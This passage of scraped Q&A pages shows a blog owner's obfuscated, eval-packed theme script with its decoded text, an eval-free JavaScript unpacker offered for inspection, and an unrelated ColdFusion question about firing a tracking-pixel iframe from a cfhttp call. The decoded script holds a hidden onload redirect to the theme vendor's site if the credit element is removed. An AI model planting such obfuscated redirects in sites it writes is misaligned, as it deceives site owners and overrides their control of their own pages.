C\x63\x6F\x6D\x6D\x65\x6E\x74\x73\x7C\x62\x79\x7C\x37\x30\x30\x7C\x61\x72\x74\x69\x63\x6C\x65\x5F\x63\x6F\x6D\x6D\x65\x6E\x74\x73\x7C\x73\x74\x79\x6C\x65\x7C\x61\x72\x74\x69\x63\x6C\x65\x5F\x63\x6F\x6E\x74\x61\x69\x6E\x65\x72\x7C\x73\x75\x6D\x6D\x61\x72\x79\x69\x7C\x61\x72\x74\x69\x63\x6C\x65\x5F\x68\x65\x61\x64\x65\x72","","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x72\x65\x70\x6C\x61\x63\x65","\x5C\x77\x2B","\x5C\x62","\x67"];
eval(function(_0x6c60x1,_0x6c60x2,_0x6c60x3,_0x6c60x4,_0x6c60x5,_0x6c60x6){
    _0x6c60x5=function(_0x6c60x3){return (_0x6c60x3<_0x6c60x2?_0x378a[4]:_0x6c60x5(parseInt(_0x6c60x3/_0x6c60x2)))+((_0x6c60x3=_0x6c60x3%_0x6c60x2)>35?String[_0x378a[5]](_0x6c60x3+29):_0x6c60x3.toString(36))};
    if(!_0x378a[4][_0x378a[6]](/^/,String)){
        while(_0x6c60x3--){_0x6c60x6[_0x6c60x5(_0x6c60x3)]=_0x6c60x4[_0x6c60x3]||_0x6c60x5(_0x6c60x3)};
        _0x6c60x4=[function(_0x6c60x5){return _0x6c60x6[_0x6c60x5]}];_0x6c60x5=function(){return _0x378a[7]};_0x6c60x3=1;
    };
    while(_0x6c60x3--){if(_0x6c60x4[_0x6c60x3]){_0x6c60x1=_0x6c60x1[_0x378a[6]](new RegExp(_0x378a[8]+_0x6c60x5(_0x6c60x3)+_0x378a[8],_0x378a[9]),_0x6c60x4[_0x6c60x3])}};
    return _0x6c60x1;
}(_0x378a[0],62,92,_0x378a[3][_0x378a[2]](_0x378a[1]),0,{}));
I was able to decode the first part using ddecode.com and came up with the following:
var _0x378a=["k E(s,n){y s.w(/<\/?(?!S\s*\/?)[a-z][a-T-9]*[^<>]*>/L,"").K(/\s+/).17(0,n-1).Z(' ')}k 11(e,t,n,h,c,b,q){5 r=j.f(e);5 i=j.f(n);5 c=c;5 b=b;5 s="";5 o=r.19("A");5 a=X;5 p="";5 16="u.M(W.8, '10', '12=Y, 13=14, 18=x, 15=x, O, N'); y P;";I(o.Q>=1){s='<3 6="V-U"><a 8="'+t+'"><A 6="R" v="'+o[0].v.w(/s\B\d{2,4}/,'s'+1o)+'" 1q=""/></a></3>';a=1s}5 g='<3 6="1r"><3 6="1t"><3 6="C"><7 6="1a">'+b+'</7><7 6="1p"><a 8="'+t+'#1m">'+c+'</a></7></3><D><a 8="'+t+'">'+n+'</a></D><3 6="C 1f"><7 6="q">1e 1n '+q+'</7><7 6="h">1d '+h+'</7></3></3>'+s+'<3 6="1b"><p>'+E(r.m,a)+' [.....]</p></3></3>';r.m=g};u.1c=k(){5 e=j.f("1g");I(e==1h){u.1l.8="J://F.G.l"}e.H("8","J://F.G.l/");e.H("1k","1j");e.m="1i.l"}","|","split","|||div||var|class|span|href|||tag|comment|||getElementById||date||document|function|com|innerHTML||||author||||window|src|replace|24|return||img||meta|h2|stripTags|www|veethemes|setAttribute|if|http|split|ig|open|resizable|scrollbars|false|length|article_img|br|z0|media|post|this|summary_noimg|550|join|windowName|rm|width|height|600|top|popup|slice|left|getElementsByTagName|article_tags|article_excerpt|onload|on|posted|post_meta|attri_bution|null|VeeThemes|dofollow|rel|location|comments|by|700|article_comments|style|article_container|summaryi|article_header","","fromCharCode","replace","\w+","\b","g"];
If I remove the script, the site breaks in certain places like Read More no longer cuts off the article on the home page and post headers are no longer visible, etc.
Any help in decoding this or tips on tools that may be available that would help me would be much appreciated.
Just remove eval in the code and throw it in the developer console.
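The eval(function(p,a,c,k,e,d){...}) wrapper in the question is the well-known "packer" layout: the inner function only performs string substitution, so the same work can be done in a plain script that returns the unpacked source for reading instead of running it. The following is an added example, not code from the question, the answer or the template's author: it re-implements the packer's index-to-token encoding (base 62, digits 0-9, a-z, then A-Z, which is why the decoded text above contains tokens like 1t and 1r) and the word-table substitution. The packed string and word list at the bottom are a constructed sample in the same shape as the question's call; to unpack the real script, pass it `_0x378a[0]`, 62, 92 and `_0x378a[3].split("|")`.

```javascript
// Added example, not part of the original question or answer: an eval-free unpacker for
// the (p, a, c, k, e, d) packer format.

// Encode an index the way the packer's e() does: base `a` digits, 0-9a-z then A-Z.
function indexToToken(i, a) {
  const high = i < a ? "" : indexToToken(Math.floor(i / a), a);
  const low = i % a;
  return high + (low > 35 ? String.fromCharCode(low + 29) : low.toString(36));
}

// p: packed source, a: radix, c: word count, k: word list (an empty slot means the token
// stands for itself). The packer loops over every index and does a \b<token>\b replace;
// one pass over word tokens with a lookup table gives the same result for a well-formed
// packed string. A Map is used instead of {} so that a word such as "constructor" can
// never resolve to Object.prototype.constructor.
function unpack(p, a, c, k) {
  const table = new Map();
  for (let i = 0; i < c; i++) {
    const token = indexToToken(i, a);
    table.set(token, k[i] || token);
  }
  return p.replace(/\b\w+\b/g, (tok) => (table.has(tok) ? table.get(tok) : tok));
}

// Constructed sample in the same shape as the question's call: (p, 62, c, "w|o|r|d|s".split("|"), 0, {})
const SAMPLE_P = "0 1(){2 '3 4'}";
const SAMPLE_K = "function|greet|return|hello|world".split("|");

function demo() {
  return unpack(SAMPLE_P, 62, SAMPLE_K.length, SAMPLE_K);
}
```

`demo()` returns `function greet(){return 'hello world'}`. Run the real packed string through `unpack` in the same way and you get readable source to review for anything the template should not be doing, without the script ever executing.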

executing js via cfhttp

I'm trying to execute some JS code via a background task.
I'm using a gateway which works similarly to PayPal, i.e. once payment details are taken, a response is sent back to a listener on my server (this could be immediate or several minutes later).
Once a response is received by the listener (listener.cfm), I'm calling a file (runPixCode.cfm) using cfhttp, which has some trigger code.
Because runPixCode.cfm is not rendered by the browser, the JS is not executing.
Also, to prove whether this worked or not, I'm getting the JS to call another file (provethisiscalled.cfm) which writes a log to a txt file.
If I put the following straight after the cfhttp call, I can see an entry in the log file. This assures me there is no issue with the JS, provided it's rendered by the browser.
<cfoutput>#cfhttp.FileContent#</cfoutput><cfabort>
However, it doesn't work with a background task. I don't know how else to deal with this; any suggestions appreciated.
listener.cfm
--Does a bunch of logic--
<cfif paymentsuccessful>
<CFHTTP URL="www.mysite.com/runPixCode.cfm" METHOD="post" timeout="12" resolveurl="true">
<CFHTTPPARAM NAME="TrackingId" VALUE="#trackingId#" TYPE="FormField">
</CFHTTP>
</cfif>
runPixCode.cfm
<SCRIPT language="JavaScript">
var axel = Math.random()+"";
var a = axel * 1000;
document.write('<IFRAME SRC="http://www.mysite.com/provethisiscalled.cfm?codearea=landing&num='+ a + '?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>');
</SCRIPT>
<NOSCRIPT><IFRAME SRC="http://www.mysite.com/provethisiscalled.cfm?codearea=landing&num=1" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME> </NOSCRIPT>
provethisiscalled.cfm
<cfloop collection=#ARGUMENTS.triggerParams# item="key">
<cfset docLogging = docLogging & chr(13) & "#key# = " & ARGUMENTS.triggerParams[key]>
</cfloop>
<cffile action="append" file="c:\serverlocation\someDir\triggerlog.txt" output="#docLogging#" addnewline="YES" >
Writing an iframe is not going to work, nor is JavaScript, because all of these processes are being called by applications, not by browsers.
So with that, you have to get creative. First, what are you really attempting to do?
If your purpose is to determine whether or not a file has been called or executed, use <cflog> or write an entry to a database.
If you are trying to pass an HTTP call from listener.cfm to runPixCode.cfm, use <cfhttp> instead of an iframe.
If your purpose is actually to execute JavaScript as part of this automated process (it isn't, but this is cool), you can execute JavaScript in your CF/Java server through Rhino, which is not incredibly simple, but you can get code snippets by googling. Rhino is included with ColdFusion as js.jar, so there are no special files to download to make it work.